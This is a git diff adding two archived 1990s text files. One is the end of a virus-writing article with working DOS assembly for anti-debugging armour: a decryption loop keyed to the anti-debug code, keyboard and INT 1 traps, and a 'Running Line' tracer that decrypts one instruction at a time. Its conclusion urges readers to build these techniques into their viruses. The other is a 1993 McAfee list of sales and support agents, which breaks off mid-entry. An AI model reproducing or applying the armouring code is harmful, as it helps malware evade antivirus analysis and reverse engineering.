ah,9 + mov dx,offset msg - 12 + add dx,12 + int 21 + mov ah,4c + int 21 + +msg db 'Yeah!!$' + +end: + +------------------------------------------------------------------------ + + Anti-Debugger Techniques: Use Your Anti-Debug Routines as The Decrypt Key + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + This is a lot easier to do then it sounds. Basically, all you have +to do is retreive a byte from the Anti - Debugger routines each time, and +use it to modify your decryption routine in some manor. Of course the code +you are decrypting must have been encrypted in a corresponding manner! Any +way, here is a code fragment example: +------------------------------------------------------------------------ + +;This code LODSBs a byte from the Anti-Debug routine, on each iteration, +;and ADDs it to the XOR key. Because of this the AV can not simply NOP +;out the INT 3, and other traps in the Anti-Debug routine which is called +;on each iteration! DEC_START is assumed to be the offset of the start of +;the encrypted code, while DEC_LENGTH is the number of bytes to decrypt. + + mov dl,0aa ;initial key. + +decrypt: mov di,offset dec_start + mov cx,dec_length + mov si,offset decrypt ;offset of code to use + ;to modify decryption key. +dec_loop: lodsb ;AL=byte from anti-debug + ;routines + + add dl,al ;MODIFY KEY. If code has been + ;modified, the key will be + ;wrong. + + xor [di],dl ;decrypt + inc di + + call anti_debug ;kill debuggers. + ;this call cant be NOP'd out, + ;as it is part of the Decrypt + ;key. + + cmp si,offset end_ad ;if SI has reached end of + jne no_fix ;anti-debug code, reset it. + mov si,offset decrypt + +no_fix: loop dec_loop + + jmp dec_start ;JMP past Anti_Debug to + ;the newly decrypted code.. + +Anti_Debug: in al,20 ;get IRQ status. + or al,2 ;Disable IRQ 1 (keyboard) + out 20,al + + int 3 ;stop the debugger on each loop (you cant + int 3 ;NOP these out!), note that when the debugger + ;stops here, the keyboard will be disabled, + ;so the can't do any thing! + + + push ax + push ds + xor ax,ax + mov ds,ax + xchg ax,[4] ;Kill INT 1 + int 3 ;Fuck with their heads + xchg ax,[4] ;restore INT 1 + pop ds + + mov ax,offset ad_jmp ;destination of JMP + push ax + pop ax + dec ax + dec ax ;if this code was traced, AX will no longer + pop ax ;be equal to the JMP destination + jmp ax + pop ax + ret + + (BELOW CODE IS ENCRYPTED) +dec_start: in al,20 + and al,NOT 2 + out 20,al ;Re-Enable Key board.. + + + +------------------------------------------------------------------------ + + Anti-Debugger Techniques: The Running Line + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + The last method, I am going to illustrate, is called the Running +Line. It is VERY resistant to debuggers. It involves hooking INT 1, and +Decrypting each instruction _JUST BEFORE_ it's run, and Re-Encrypting it +_STRAIGH AFTER_ it has been executed. This way, only _1_ instruction at +a time is decrypted in memory. Here is a fully working example. +------------------------------------------------------------------------ + +;RUNLINE.ASM + + radix 16 + + org 100 + + xor ax,ax ;ax=0 + mov es,ax ;es=ax=0 + mov di,es:W[4] + mov si,es:W[6] ;save int 1 vector + mov es:W[4],offset tracer + mov es:W[6],cs ;int1 = cs:tracer + mov bp,sp + pushf + or B[bp-1],1 ;set TRACE flag + popf ;set it + + xor dx,dx ;this serves no purpose, and + ;is just here because the first + ;instruction after setting the + ;flag is not traced. + +;********************************************************************** +;** The below data, is the Encrypted instructions. The INT 1 handler ** +;** only decrypts instruction on WORD (EVEN) boundaries. It XORs the ** +;** instruction (WORD) with its offset in CS (ie. it's IP when it's ** +;** run). Thats why each word is XOR'd with $ (it's position). ** +;********************************************************************** + + dw 01f0e XOR $ ;PUSH CS / POP DS + dw 009b4 XOR $ ;MOV AH,9h + dw 0ba90 XOR $ ;NOP / MOV DX, + dw offset msg ;offset msg + dw 021cd XOR $ ;INT 21h + dw 0e589 XOR $ ;MOV BP,SP + dw 06680 XOR $ ;AND B[BP+, + dw 0feff ;FF],FE (turn off TRACE flag). + +last_enc equ $ + dw 0bb9d XOR $ ;POPF / MOV BX, + dw last_enc ;LAST_ENC + + xor cs:W[bx],bx ;re-encrypt last instruction.. + + mov es:W[4],di + mov es:W[6],si ;restore int 1 vector + + mov ah,4c + int 21 + +;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ +;THINGS TO NOTE FROM THE ABOVE: Firstly, in the instructions +; NOP +; MOV DX,OFFSET MSG +;the MOV DX opcode is on an odd boundary, and hence, the decryptor will +;not decrypt it. Secondly the 'DW OFFSET MSG' in MOV DX,OFFSET MSG +;is not encrypted, because it it is data from another instruction, and +;therefore it will never be executed, and passed to the INT 1 handler. +;The same goes for the +FF(-1),FE in the AND B[BP-1],FE. + + +;********************************************************************** +;** The following procedure, is the work horse of this code. The CPU ** +;** will call this INT 1 handler before each opcode as long as the ** +;** TRACE flag is set. Unlike most INT 1 handlers that you'll see in ** +;** virii, this contains no defensive traps. This is because we are ** +;** tracing our own code, and not unknown (possibly hostile) code. ** +;** It retrieves the calling IP from the stack, and if it is odd, ** +;** exits. If even, it will re-encrypt the previous instruction, and ** +;** decrypt the current one. It saves the calling IP, so that it can ** +;** re-encrypt it when it is called for the next instruction. ** +;********************************************************************** + +tracer: + push bp ;save BP + mov bp,sp ;BP=SP for reference point of stack. + push si ;save SI + mov bp,W[bp+2] ;BP = calling IP (position of + ;encrypted instruction). + test bp,1 ;check if on an odd boundry.. + jnz is_odd ;it is so leave. + mov si,cs:last ;else get the position of the last + ;decrypted instruction to reincrypt. + mov cs:last,bp ;save current position for next time. + xor cs:W[si],si ;re-encrypt last (XOR it with its IP) + xor cs:W[bp],bp ;decrypt current (XOR it with its IP) +is_odd: + pop si ;restore SI + pop bp ;restore BP + iret ;adeos! + +last dw 0 ;last IP for re-encrpytion.. +msg db 'Yeah!!$' ;EVERYBODY SAY YEAH!!!! +------------------------------------------------------------------------ + + CONCLUSION + ~~~~~~~~~~ + + -TAUGHT-WHEN-WE-ARE-YOUNG-TO-HATE-ONE-ANOTHER- + + I STRONGLY urge you to employ the above techniques in your virii +and/or poly engine. If your virus refuses to infect bait files, is VERY +heavilly armoured, so the can not decrypt it, and dissasemble it, and +mutates so slowly, and on such obscure conditions, HOW ARE THEY GOING TO +IT? Devising an algorith for such a virus would be _VERY_ difficult. + + + BYE -- BYE + ~~~~~~~~~~ + Thank you reading this article. I hope it's been as interesting +to read as it has been to write!! Hopefully, we will be seeing the AV +having to work _ALOT_ harder for their money too ;). Alternitively, this +could be some help to the AV community, so they can see what lies ahead. + + If you have any questions, comments, critisms, or new ideas, you +can get in touch with me on IRC, channel #VIRUS, Nickname 'Sepultura' or +'Sep'. I would really appreciate _ANY_ comments (excpet 'Get Bent!!'). + + + + - THE - END - +================================================================================ diff --git a/textfiles.com/virus/agents.txt b/textfiles.com/virus/agents.txt new file mode 100644 index 00000000..2a73cf62 --- /dev/null +++ b/textfiles.com/virus/agents.txt @@ -0,0 +1,1327 @@ + McAFEE ASSOCIATES AGENT LISTING + + February 23, 1993 + + +McAfee Associates, Inc. (408) 988-3832 office +3350 Scott Boulevard, Building 14 (408) 970-9727 fax +Santa Clara, California 95054-3107 (408) 988-4004 BBS (25 lines) +U.S.A. USR HST/v.32/v.42bis/MNP 1-5 + support@mcafee.COM InterNet + GO MCAFEE CompuServe + + In order to provide the global community with anti-virus +coverage in a timely manner, McAfee Associates has established an +Agents program to provide service, sales and support for McAfee +Associates products around the world. If you do not see your +country listed, please contact McAfee Associates directly. A +listing of United States Agents has been added to the end of this +file. + + +ARGENTINA +RAN Ingenieria de Sistemas +Address: Cosquin 10-5o. C + Buenos Aires 1408 +Contact: Maria Jose Alvarez Hamelin +Telephone: +54 (1) 642-3689 +Fax: +54 (1) 334-7802 + +AUSTRALIA +Computer Virus Clinic +Address: P.O. Box 106 + Moorebank, N.S.W. 2170 +Contact: Colin Keeble +Telephone: +61 (02) 822-4303 Sydney +Fax: +61 (02) 822-4304 +BBS: +61 (02) 602-9237 [9600bps, v.32, 24hrs] +Telephone: +61 (03) 335-4677 Melbourne +Fax: +61 (03) 335-4656 +Telephone: +61 (08) 234-5287 Adelaide +Fax: +61 (08) 234-5324 +Telephone: +61 (07) 261-3565 Queensland +Fax: +61 (07) 261-2059 + +AUSTRALIA +Computerware for Micros +Telephone: (008) 882-875 National Toll Free +Fax: +61 (08) 363-1974 National +BBS: +61 (08) 362-4293 National + ADELAIDE - HOME OFFICE +Address: 23 Magill Road + Stepney, Adelaide, S.A. 5096 +Contact: Priestly Hillam +Telephone: +61 (08) 362-8200 + SYDNEY BRANCH +Contact: John Hillam +Telephone: +61 (02) 252-3546 +Fax: +61 (02) 252-3353 +BBS: +61 (08) 311-1036 + MELBOURNE BRANCH +Contact: Michael O'Sullivan +Telephone: +61 (03) 663-4868 +Fax: +61 (03) 663-7466 +BBS: +61 (03) 888-5932 + BRISBANE BRANCH +Telephone: +61 (07) 285-2339 +Fax: +61 (07) 363-1974 +BBS: +61 (07) 804-0239 + PERTH BRANCH +Contact: Rob Edwards +Telephone: +61 (09) 357-0818 +BBS: +61 (09) 307-8075 + CANBERRA BRANCH +Contact: David Fabris +Telephone: +61 (06) 259-1814 +BBS: +61 (06) 259-2062 + TOWNSVILLE BRANCH +BBS: +61 (077) 79-1546 + +AUSTRALIA +Doctor Disk (Perth Office) +Address: 77 Bulwer Street + Perth, WA 6000 +Contact: Greg Golden +Telephone: +61 (09) 328-2011 (Perth Office) +Fax: +61 (09) 328-9661 (Perth Office) +BBS: +61 (09) 244-2111 (Perth Office) +Telephone: +61 (02) 281-2099 (Sydney Office) +Telephone: +61 (03) 690-9100 (Melbourne Office) +Telephone: +61 (07) 831-0151 (Brisbane Office) +Telephone: +61 (08) 332-2354 (Adelaide Office) +Toll-Free: (008) 999 755 (outside of Perth Metro Area) + +AUSTRIA +ComIn Terramar Handelsgesmbh +Address: Nikolsdorfergasse 8/8 + A-1050 Wien +Contact: Ronald Schmutzer +Telephone: +43 (1) 545-3731 +Fax: +43 (1) 545-3339 +BBS: +43 (1) 545-3338 + +BAHRAIN +Deena International Commercial Agency +Address: P.O. Box 5168 + Al Zahra Bldg., 1st Floor + SH Issa Al Kabeer Rd. + Manama +Contact: Ehab Al-Maskati +Telephone: +973 261 247 +Fax: +973 230 418 +Telex: 8613 DICA BN +Cable: DICANTER + +BELGIUM +Impakt nv +Address: Ham 64 + B-9000 Gent +Contact: Frank Lateur +Telephone: +32 (91) 25 35 49 +Fax: +32 (91) 33 00 78 +BBS: +32 (91) 23 40 16 + +BELGIUM +Softserve Distributors +Address: Dynamicalaan 16 b20 + B-2601 Wilrijk +Contact: Arthur Schrey +Telephone: +32 (3) 830 59 92 +Fax: +32 (3) 830 25 92 + +BERMUDA +Applied Computer Technologies +Address: P.O. Box HM 2091 + Hamilton, HM HX +Contact: Craig Clark +Telephone: (809) 295-1616 +Fax: (809) 292-7967 +BBS: (809) 292-7376 [U.S. Robotics HST 14.4K] + (809) 292-1774 [v.32bis] + +BERMUDA +Business Systems Ltd. +Address: P.O. Box HM 2445 + Hamilton, HM JX +Contact: Joseph Geaney +Telephone: (809) 295-8777 +Fax: (809) 295-1149 + +BRAZIL +COMPUSUL Consultoria e Comercio de Informatica Ltda. +Address: Rua Emboabas, 68-1o andar + 04623-Sao Paulo, SP +Contact: Andre Pitkowski +Telephone: +55 (11) 530-6822 +Fax: +55 (11) 531-7598 +BBS: +55 (11) 247-2899 [1200-14,400 bps, v.32/v.32bis] + (call for BBS numbers in other cities) + +BRAZIL +Maple Informatica Ltda. +Address: R. Maranhao, 554 cj. 26 + 01240 Sao Paulo, SP +Contact: David Rotenberg +Telephone: +55 (11) 826-5311 +Fax: +55 (11) 826-5375 + +CANADA +Asgard Technologies +Address: 175 Hunter Street East Suite #313 + Hamilton, Ontario + CANADA L8N 4E7 +Contact: Michael B. Cameron +Telephone: (416) 529-9284 +Fax: (416) 529-9186 + +CANADA - British Columbia +Concise Systems Corp. +Address: #25 - 1925 Bowen Road + Nanaimo, BC + CANADA V9S 1H1 +Contact: John Fischer or Carol Sanders +Telephone: (604) 756-1604 +Fax: (604) 756-0123 + +CANADA +DOLFIN Developments Ltd. +Address: 2904 South Sheridan Way + Oakville, Ontario + CANADA L6J 7L7 +Contact: John Reid +Telephone: (416) 829-4344 + 1 (800) 668-7434 Toll Free +Fax: (416) 829-4380 + +DOLFIN Developments- Montreal +Address: 2690B Pitfield, Bureau 100 + St-Laurent, Montreal, Quebec + CANADA H4S 1G9 +Contact: Simon Borduas +Telephone: (514) 333-7240 +Fax: (514) 333-7165 +BBS: (514) 735-5769 + +DOLFIN Developments- West +Address: Maison Chadwick House + 1842 - 14th Street SW + Calgary, Alberta + CANADA T2T 3S9 +Contact: Terry O'Hearn +Telephone: (403) 229-3454 +Fax: (403) 229-3507 + +CANADA - Edmonton +LOGICORP Data Systems Ltd +Address: Suite 301, 11044 - 82nd Avenue + Edmonton, Alberta + CANADA T6G 0T2 +Contact: Peter Altrogge +Telephone: (403) 433-2830 +Fax: (403) 439-2134 + +CANADA - Edmonton +Programmers Guild Products +Address: 4652 - 99th Street + Edmonton, Alberta + CANADA T6E 5H5 +Contact: George Woycenko +Telephone: (403) 438-5897 +Fax: (403) 434-3957 + +CANADA - Ottawa +Schultz Computers +Address: 1825 Woodward Drive + Ottawa, Ontario + CANADA K2C 0R4 +Contact: John Schultz +Telephone: (613) 727-0589 +Fax: (613) 727-1264 +BBS: (613) 727-1264 + +CHILE +Rigg S.A. +Address: Avda. Salvador 1068 + P.O. Box 10.295 + Santiago +Contact: Ricardo Gutierrez +Telephone: +56 (2) 225-0222 +Fax: +56 (2) 225-0240 + +CZECH REPUBLIC +AEC Ltd. +Address: Sumavska 33 + 612 64 BRNO +Contact: Jiri Mrnustik, MSc. +Telephone: +42 (5) 7112 line 502 +Fax: +42 (5) 013 501 + + +DENMARK +Danadata A/S +Address: Graham Bells Vej 7 + 8200 Aarhus N +Contact: Steen Pedersen +Telephone: +45 (86) 18 28 44 +Fax: +45 (86) 78 31 38 +BBS: +45 (86) 78 31 34 [1200-9600bps/v.32/24 hours] + +FINLAND +ICL Data Oy/PC-Hotline (Kayttotuki) +Address: P.O. Box 458 + SF-00101 Helsinki +Contact: Kari Ilonen or Erkki Mustonen +Telephone: +358 (0) 567 4248 +Fax: +358 (0) 567 4160 +BBS: +358 (0) 567 5200/5203 [U.S. Robotics Dual Standard] + +FINLAND +SAFECO OY +Address: Kirvuntie 22 + 02140 Espoo +Contact: Hannu Ohrling +Telephone: +358 (0) 512 1100 +Fax: +358 (0) 515 151 +BBS: +358 (9)0 512 2483 +MCI Mail: 540-0324 + +FRANCE +VIF "La Pepiniere" +Address: 111, avenue de Lodeve + 34000 Montpellier +Contact: Sophie Kroll +Telephone: +33 (16) 67 06 01 55 +Fax: +33 (16) 67 58 26 61 + +GERMANY +BBT Electronics +Address: Hundsmuhler Str. 12 + W-2900 Oldenburg +Contact: David Thorlton - Marketing + Ralf Fischer - Support +Telephone: +49 (0) 441-950930 +Fax: +49 (0) 441-504481 +BBS: +49 (0) 441-9509333 + +GERMANY +BFK edv-consulting GmbH +Address: Humboldystrasse 48 + W-7500 Karlsruhe 1 +Contact: Christoph Fischer +Telephone +49 (721) 96201-1 +Fax: +49 (721) 96201-99 + +GERMANY +Nane Juergensen + Alpenstrasse 52 + 8038 Grobenzell +Contact: Nane Jurgensen +Telephone: +49 (8) 1425-3030 +Fax: +49 (8) 1425-4641 +CompuServe 100021,414 + +GERMANY +Kirschbaum Software, GmbH +Address: Kronau 15 + W 8091 Emmering b. Wbg. +Contact: Josef Kirschbaum +Telephone: +49 (0) 8067-1016 +Fax: +49 (0) 8067-1053 + +GERMANY +K.H. Kitroschat, Ingenieurbuero fr Neue Technik +Address: Naabstrasse 9 + W-4006 Erkrath +Contact: Karl-Heinz Kitroschat +Telephone: +49 (0) 2104 48626 +Fax: +49 (0) 2104 449 555 + +GERMANY +NoVIR Apura GmbH +Address: Hochofenstrasse 19-21 + 2400 Lubeck 14 +Contact: Joerg Feierabend +Telephone: +49 (0) 4513 06066 Zentrale + +49 (0) 4513 06067 Allgemeine Hotline + +49 (0) 4513 01068 Hotline mit Kennummer +Fax: +49 (0) 4513 09600 + +49 (0) 4513 01306 Infophon ueber Versionsnummern etc. +BBS: +49 (0) 4513 05267 +BTX: *NoVIR# + +GERMANY +R. Bucker EDV +Address: Nordhemmer Strae 94 + W 4955 Hille 1 +Contact: Peter Bucker +Telephone: +49 (0) 5703-2829 + +49 (0) 5703-3610 +Fax: +49 (0) 5703-3648 + +GHANA +Network Computer Systems Ltd. +Address: PO Box 2649 + Accra +Contact: Anne Grant +Telephone: +233 (21) 773372 + +233 (21) 772279 +Fax: +233 (21) 772279 +Telex: 3047/48 BTH25 GH + +GIBRALTAR +Interactive Systems Ltd. +Address: PO Box 397 + 15A Tuckey's Lane +Contact: Jim Watt +Telephone: +350 73285 +Fax: +350 73385 + +GREECE +TopNet Computers Ltd +Address: 15 Mpakopoulou St. + 154 51 Neo Psixiko + Athens +Contact: Dimitrios Georgiadis +Telephone: +30 (1) 647 6066 + +30 (1) 647 5378 +Fax: +30 (1) 672 6629 + +HONG KONG +Terabyte Computer Consultants Ltd. +Address: Room 1004, 10/F, Tung Wah Mansion + 199-203 Hennessy Road + Wan Chai +Contact: Isabel Chan +Telephone: +852 (0) 598-0046-51 +Fax: +852 (0) 598-0892 + +HUNGARY +Pik-SYS Company Ltd. +Address: Szentmiklosi u.18 + H-1213 Budapest +Contact: Maria Pistar +Telephone: +36 (1) 276-0864 +Fax: +36 (1) 276-5714 + +ICELAND +Tolvur og Fjarskipti +Address: Dugguvogi 2 + 104 Reykjavik +Contact: Jim Hayward or Ari Thor Johannesson +Telephone: +354 (9) 227237 +Fax: +354 227348 +BBS: +354 (9) 1995151 [6 lines] +BBS NUA: X.25 NUA 271011991000 + +INDIA +Foremost Systems P. Ltd. +Address: 2G, Kashmir Emporium Bldg. + P.m. Road + Bombay 400 034 +Contact: Mr. Siddharth Mehta +Telephone: +91 (22) 2668626 +Fax: +91 (22) 2666273 +Telex: 011-82579 (Attn: Sid Mehta) + +INDONESIA +P.T. Yakin Aman +Address: #15-16, Block FX-1 + Jalan Kelapa Gading Boulevard + Jakarta 14240 +Contact: M.A. Sunardi +Telephone: +62 (21) 451-0072 +Fax: +62 (21) 451-2731 + +IRELAND +Systemhouse Technology Group Ltd +Address: 39-40 Upper Mount Street + Dublin 2 +Contact: Dermot Williams or Stephen Kearon +Telephone: +353 (1) 615 445 +Fax: +353 (1) 615 323 +BBS: +353 (1) 288-5634 + +353 (1) 283-1908 [U.S. Robotics HST] + +ISRAEL +Chief Data Recovery Company +Address: 15 Ha'banim Street + PO Box 499 + Nes-Ziona 70400 +Contact: Nemrod Kedem +Telephone: +972 (8) 400 070 +Fax: +972 (8) 403 295 +BBS: +972 (3) 966 7562 [v.32bis/v.42bis/14400bps] + +972 (3) 967 3919 [v.32bis/v.42bis/14400bps] + +972 (3) 967 3499 [v.32bis/v.42bis/14400bps] + +972 (3) 967 3256 [MNP5/2400bps] + + +ITALY +Ultimobyte Editrice, SRL +Address: Via A. Manuzio, 15 + 20124 Milano +Contact: Adalberto Fontana +Telephone: +39 (2) 655-5306 +Fax: +39 (2) 65.55.061 + +JAMAICA +W.T.G APTEC Systems Ltd. +Address: "The Towers" + 25 Dominca Drive + Kingston 5 +Contact: Arnold McDonald +Telephone: (809) 929-9250 +Fax: (809) 929-8296 + +JAPAN +LINK Co., Ltd. +Address: Rosebud Gotanda Bldg 10F + 8-8-15 Nishi-Gotanda + Shingawa-ku + Tokyo 141 +Contact: Akira Watanabe +Telephone: +81 (3) 3493 5850 +Fax: +81 (3) 3493 5188 + +KOREA +Myung-Je Corporation +Address: Insung Bldg. + 266-8 Yangjae-Dong, Seocho-Ku + Seoul, 137-130 +Contact: Park Dong Myung +Telephone: +82 (2) 575-5770 +Fax: +82 (2) 579-3817 + +KUWAIT +Sultan Systems +Address: Salem Mubarak Street + Bldg. 17, Block 49, 5th Floor + Safat 13132 +Contact: Mohanned Hassanin +Telephone: +965 572 3153 + +965 572 3155 +Fax: +965 572 3152 + +MALAYSIA +MCSB Systems (M) Sdn Bhd +Address: Ground Floor, Wisma Mirama + Jalan Wisma Putra + 50460 Kuala Lumpur +Contact: Mr. Mok Fork Chuan +Telephone: +60 (3) 241 7400 +Fax: +60 (3) 248 8010 + +MAURITIUS +J. Kalachand & Co. Ltd. +Address: 20 A&B Lord Kitcheter Street + Port-Louis +Contact: Ramesh Kalachand +Telephone: +230 212-6313 +Fax: +230 208-8244 + +MEXICO +Ingenieria y Technologia Avanzada, S.A. de C.V. +Address: Vanegas #212 + Col. Mitras Centro + Monterrey, Nuevo Leon, 64460 +Contact: Raul Quintanilla, Director +Telephone: +52 (083) 46 9865 +Fax: +52 (083) 46 9865 +BBS: +52 (83)58 1477 [1200/2400 bps] + +52 (83)59 9848 [1200/2400 bps] + +52 (83)59 9849 [1200/2400 bps] + +MEXICO +McAfee Associates, Mexico, S.A. de C.V. +Address: Ave. Nuevo Leon No.253, Desp. 501 + Col. Escandon, C.P. 11800, Mexico D.F. +Contact: Arturo De la Mora Carrasco + Felipe Lopez Gomez + Patricia De la Mora +Telephone: +52 (5) 273-1361 + +52 (5) 273-0954 +Fax: +52 (5) 273-1019 +BBS: +52 (5) 590-5988 [1200-9600 bps] + +MEXICO +Mundo PC, S.A. +Address: Rio San Lorenzo No. 507-A OTE + Garza Garcia, N.L. 66220 +Contact: Bill Schaefer +Telephone: +52 (8) 378-34-48 + +NETHERLANDS, THE +CPU Communications & Products United C.V. + SALES OFFICE +Address: Jacob van Maerlandstraat 86-90 + 5216 JM 's Hertogenbosch + PO Box 1878 + 5200 BW 's Hertogenbosch +Contact: Rick Wezenaar +Telephone: +31 (73) 141252 +Fax: +31 (73) 140437 +BBS: +31 (73) 124674 [14,400bps] + +31 (73) 130204 [2400 bps] + SUPPORT OFFICE +Address: Verzamlegebouw Zuid + Strevelsweg 700/302 + 3083 AS Rotterdam + PO Box 5011 + 3008 AA Rotterdam +Contact: Fred Janssen or Fred de Koning +Telephone: +31 (10) 4102233 +Fax: +31 (10) 4808555 +BBS: +31 (10) 4103188 [14,400bps] + +31 (10) 4103022 [2400bps] + +NETHERLANDS ANTILLES +Micro Computer Consultants +Address: Fokkerweg 30 + Muskus Building + Willemstad Curaco +Contact: Edison Maduro +Telephone: +599 (9) 61 31 61 +Fax: +599 (9) 61 61 19 + +NEW ZEALAND +Computer Software Library of NZ, Ltd. +Address: WaiPoPo 3 R.D. + Timaru +Contact: Bill Strauss +Telephone: +64 (3) 615-9333 +Fax: +64 (3) 615-9333 +BBS: +64 (3) 615-9313 +Mobile Phone +64 (25) 32-8443 + +NORWAY +COMMA +Address: P.O. Box 6448 Etterstad + 0605 Oslo +Contact: Frode Jonsrud +Telephone: +47 (2) 627500 +Fax: +47 (2) 627501 + +PHILIPPINES +Mannasoft Technology Corporation +Address: Suite 105 Mid-Land Mansion + 839 Pasay Road, Makati + Metro Manilla +Contact: Hans C. Dee +Telephone: +63 (2) 87 63 19 + +63 (2) 813-41-62 + +63 (2) 813-41-63 +Pager Service:+63 (2) 869 11 11 +FAX: +63 (2) 812 93-10 + +PORTUGAL +Fobis, Informatic e Gestao, Lda. +Address: Praca de Londres 3-1.Dt + P-1000 Lisboa +Contact: Nuno Pinto +Telephone: +351 (1) 848 31 84 +Fax: +351 (1) 848 17 77 + +SAUDI ARABIA +Gulf Stars Computer Systems +Address: PO Box 52908 + Riyadh 11573 +Contact: Anwar Qahwash +Telephone: +966 (1) 432-8222 +Fax: +966 (1) 465-3156 +Telex: 407602 GSCS SJ + +SINGAPORE +Asiasoft (S) PTE. LTD. +Address: No. 8, Aljunied Avenue 3, Oakwell Bldg. + Singapore 1438 +Contact: Lai Lee Tat +Telephone: +65 742 6000 +Fax: +65 742 7000 +BBS: +65 741 8707 + +SINGAPORE +Computerware for Micros +Address: Block 165, Bukit Merah Central + #05-3683 + Singapore 0315 +Contact: Eddie C.K. Teo +Telephone: +65 271-6001 +Fax: +65 271-6003 +Pager: +65 204-2319 +BBS: +65 448-3395 + +SINGAPORE +MCSB Systems (S) Pte Ltd +Address: 5 Little Road + #05-01 Cemtex Industrial Building + Singapore 1953 +Contact: Ivan Wainewright +Telephone: +65 382-7600 +Fax: +65 382-5700 + +SLOVAKIA +NKOP elektronik Ltd. +Address: Coboriho 2 + 949 01 NITRA +Contact: Peter Zoldos +Telephone: +42 (87) 419 780 +Fax: +42 (87) 413 958 + +SOUTH AFRICA +Dynamic Solutions +Address: P.O. Box 4397 + Cape Town 8000 +Contact: Oliver Steudler +Telephone: +27 (21) 24 9504 +Fax: +27 (21) 26 1911 +BBS: +27 (21) 24 2208 [1200-14,400 bps U.S. Robotics HST/v.32/v.42bis] +CompuServe: 100075,200 +Fidonet: 5:7102/110 +Internet: Oliver.Steudler@f110.n7102.z5.fidonet.ORG + or 100075.0200@compuserve.COM +Beltel: 608780 + +SOUTH AFRICA +International Data Security (Pty) Ltd. +Address: Shop 10 + 191 Chapel Street + Pietermaritzburg + Natal 3201 +Contact: Gavin Nesbitt +Telephone: +27 (331) 427 134 +Fax: +27 (331) 427 135 +BBS: +27 (331) 455 710 [300-14,400 bps U.S. Courier v.32/v.42bis] + +SPAIN +DATAMON, SA Central +Address: Corcega, 485 + 08025 Barcelona +Contact: Carmen Mestres +Telephone: +34 (3) 207-2704 +Fax: +34 (3) 457-1370 + +SPAIN +DATAMON, SA - Macroservice +Address: C/Infanta Mercedes, 83 + 28020 Madrid +Contact: Diego Saez +Telephone: +34 (1) 571 52 00 +Fax: +34 (1) 571 19 11 + +SWEDEN +Virus Help Centre - MAIN Office +Address: Box 7018 + S 811 07 Sandviken +Contact: Mikael Larsson +Telephone: +46 (26) 100518 +Direct Phone: +46 (26) 275740 +Mobile Phone: +46 (10) 295 5551 +Fax: +46 (26) 275720 +BBS: +46 (26) 275710 [U.S. Robotics Dual Standard] + +46 (26) 275715 [U.S. Robotics HST] +Fidonet: 2:205/204 or 2:205/234 +VirNet: 9:461/101 or 9:461/111 +Internet: mikael@abacus.hgs.se + +Virus Help Centre - GAVLE Office +Address: Box 1237 + S 801 37 Gavle +Contact: Ola Larsson +Mobile Phone: +46 (10) 295-5552 +Fidonet: 2:205/212 +VirNet: 9:461/112 +Internet: ola@abacus.hgs.se + +SWITZERLAND +DASIKON AG (formerly Computer Concepts Marcus Laeubli) +Address: Sandbueelstrasse 6 + P.O. Box 2101 + CH-8604 Volketswil +Contact: Marcel Riwar +Telephone: +41 (1) 945-5970 +Fax: +41 (1) 946-0545 +BBS: +41 (1) 945-5077 + +TRINIDAD & TOBAGO +Opus Networx +Address: P.O. Box 972 + Port of Spain, Trinidad & Tobago + West Indies +Contact: Peter Wimbourne +Tel: (809) 625-5946 +Fax: (809) 625-5950 +BBS: (809) 625-5077 + +TURKEY +MBS Bilgisayar Hiz.ve Tic.Ltd.Sti. +Address: Buyukdere Cad. No. 4/7 + Sisli - Istanbul +Contact: Cem Celik +Telephone: +90 (1) 231-8008 +Fax: +90 (1) 240-3664 + +UNITED KINGDOM +International Data Security +Address: 9 & 10 Alfred Place + London WC1E 7EB +Contact: Oliver Mills +Telephone: +44 (71) 631 0548 + +44 (71) 436 2244 +Fax: +44 (71) 580 1466 +BBS: +44 (71) 580 4800 + +URUGUAY +Datamatic +Address: 25 de Mayo 635 Piso 6 + Montevideo 11100 +Contact: Ivonne Chabaneau + Juan Camps (technical) +Telephone: +598 2 96 18 42 +Fax: +598 2 96 27 71 + +VENEZUELA + +Lantech Ltd. +Address: Edit. La linea, Ave. Libertador + Torre A - Piso 15 + Caracas +Contact: Vladimir Castillo +Telephone: +582 781 4655 +Fax: +582 781 7454 + +ZAMBIA +KBM Software Plaza +Address: P.O. Box 320139 + Woodlands + Lusaka +Contact: (Mrs.) Kasonde B. Shakalima +Telephone: +260 (1) 260 151 +Fax: +260 (1) 260 196 + +UNITED STATES +Advanced Computer Networks +Address: 260 Old Nyack Turnpike + Spring Valley, NY 10977 +Contact: Lazer Milstein, CNE or + David Adams +Telephone: (914) 425-5858 +Telephone: (800) 383-0257 Order inquriry +Fax: (914) 425-4306 +BBS: (914) 425-2304 [300-14,400 bps U.S. Robotics HST/v.32/v.42bis] + +UNITED STATES +Advanced Computer Technologies +Address: 108 Main Street + Norwalk, CT 06851 +Contact: Larry McNally +Telephone: (203) 847-9433 +Fax: (203) 847-2475 + +UNITED STATES - Pacific Northwest +Al Mashburn & Associates +Address: 7406 - 27th Street West, Suite 8 + Tacoma, WA 98466 +Contact: Al Mashburn +Telephone: (206) 565-8641 +Fax: (206) 565-3134 + +UNITED STATES +Automated Business Concepts +Address: 1005 Farmington Rd. + Pensacola, FL 32504-7037 +Contact: Bill Miller +Telephone: (904) 474-1575 +Fax: (904) 474-1589 + +UNITED STATES +Barish & O'Brien Consulting +Address: 19 West 44th Street, Suite 300 + New York, NY 10036 +Contact: David Barish +Telephone: (212) 221-1600 +Fax: (212) 221-1658 + +UNITED STATES - New England +Beehive Computer Company +Address: #2 Industrial Park Drive + Concord, NH 03301 +Contact: Jeff Parkerson +Telephone: (603) 226-2993 +Fax: (603) 226-2070 + +UNITED STATES - Midwest +Blue Chip Computer Company +Address: 3085 Woodman Drive + Dayton, OH 45420 +Contact: Jim King +Telephone: (513) 299-4594 +Fax: (513) 298-5798 + +UNITED STATES - Northern California +C&P Solutions +Address: 14428 Union Avenue + San Jose, CA 95124 +Contact: Luis Paz +Telephone: (408) 559-4049 +Fax: (408) 559-8645 + +UNITED STATES +CDT, Inc. +Address: 3110 Rhapsody Court + Colorado Springs, CO 80920 +Contact: Glen Sandusky +Telephone: (719) 260-0567 +Fax: (719) 531-5256 + +UNITED STATES +CompuNet, Inc. +Address: 8080 